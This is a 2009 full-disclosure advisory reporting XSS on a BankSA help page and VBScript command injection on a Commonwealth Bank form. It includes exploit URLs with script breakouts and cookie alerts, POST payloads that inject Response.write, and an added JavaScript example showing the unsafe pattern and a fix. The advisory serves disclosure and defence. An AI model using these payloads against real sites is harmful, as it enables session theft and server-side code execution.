Date: Tue, 12 May 2009 18:44:56 +0800
From: militan c7 <militan.c7@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Security Advisory: Banks in Australia

==============================================
Security Advisory: Banks in Australia

militan (Chia-Jun Lin)
militan.c7@...il.com
adl.csie.ncu.edu.tw/~militan
militan-c7.blogspot.com
Advanced Defense Lab (ADL), NCU CSIE TAIWAN
12th May, 2009
==============================================


I. VULNERABILITY
-------------------------
XSS
Command Injection

Banks below are vulnerable:
BankSA. www.banksa.com.au
Commonwealth Bank. www.commbank.com.au
etc...

II. DESCRIPTION
-------------------------
Certain pages on some banks' websites contain vulnerabilities that attackers
may misuse. Through the command injection, attackers can execute any VBScript
command on the hosts.

In general, the websites of banks in AU do implement security mechanisms.
However, their architectures are unnecessarily complex. Because the
architectures are so large, some pages do not perform validation properly.


III. Detail & POC
------------------------
1. BankSA: XSS. Javascript Injection.
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS
"BBO" stands for "Business banking online", and the vulnerable
variable is "origin".

If origin=CBS, the page will immediately redirect to the link below.
www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS

However, if origin=CBS" (note the trailing double quote), the page redirects
incorrectly, because the quote ends up inside the generated script:
****javascript code generated in the intermediate page
function focusWin()
{
  window.focus();
  //var theUrl = window.location.pathname;
  //var pos = theUrl.indexOf("help.asp");
  //theUrl = theUrl.substr(0,pos);
  window.location.href = "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"";
  //document.write("http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"");
}
window.onload = focusWin;
****

Exploit:
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);//
webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}</script>%0a%0a<script>alert("Vulnerable")</script>
POC:
http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg
http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg
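
The flaw in item 1 is a request parameter written into a JavaScript string
literal without encoding. The following is an added example, not code from the
advisory or from the bank: it reproduces the pattern and shows a fix in two
layers (context-aware encoding and an allow-list). The function names and the
contents of the allow-list are assumptions.

```javascript
// Added example: hypothetical names, not the bank's code.
const BASE = "http://www.banksa.com.au/business/business-banking-online/user-guide/";

// Assumption: the legitimate values of "origin" are few and known in advance.
const ALLOWED_ORIGINS = new Set(["CBS"]);

// Constructed inputs: the normal value and the advisory's two payloads, URL-decoded.
const SAMPLES = [
  'CBS',
  'CBS";\n\nalert(document.cookie);//',
  'CBS";}</script>\n\n<script>alert("Vulnerable")</script>',
];

// Vulnerable pattern: the parameter is pasted into a JS string literal as-is.
function renderUnsafe(origin) {
  return '<script>\nwindow.location.href = "' + BASE +
    '?source=applet&origin=' + origin + '";\n</script>';
}

// Encode any value as a JS string literal that cannot close the <script> block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Fix, layer 1: URL-encode the parameter, then JS-encode the whole URL.
function renderEncoded(origin) {
  const url = BASE + "?source=applet&origin=" + encodeURIComponent(origin);
  return "<script>\nwindow.location.href = " + jsStringLiteral(url) + ";\n</script>";
}

// Fix, layer 2: reject anything outside the allow-list before rendering.
function isAllowedOrigin(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// Count <script> openers: more than one means the input escaped the literal.
function countScriptTags(html) {
  return html.split("<script>").length - 1;
}

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "allowed:", isAllowedOrigin(s),
    "unsafe tags:", countScriptTags(renderUnsafe(s)),
    "encoded tags:", countScriptTags(renderEncoded(s)));
}
```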


2. Commonwealth Bank: ASP command injection (server-side vbscript injection)
Commbank provides many tools for calculating or evaluating a financial
plan.
This page collects personal information and makes an appointment.
www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp
However, almost all of the parameters are processed by VBScript on the server.

Moreover, the page returns an error message when the parameters are
mangled. Attackers can therefore craft an exploit easily, and arbitrary
VBScript commands can then be executed on the server.

Exploit:
post parameter: Whattodo (default: FillForm)
FillForm & Response.write("ccccc")'
FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '
POC:
http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank3.jpg
http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg


IV. SOLUTION & CONCLUSION
-------------------------
Most banks in AU should reduce the enormous architecture of their websites:
either do not provide additional functions, or make sure that these functions
are secure.

The vulnerabilities have been fixed already.


regards
--
militan
Advanced Defense Lab, NCU Taiwan
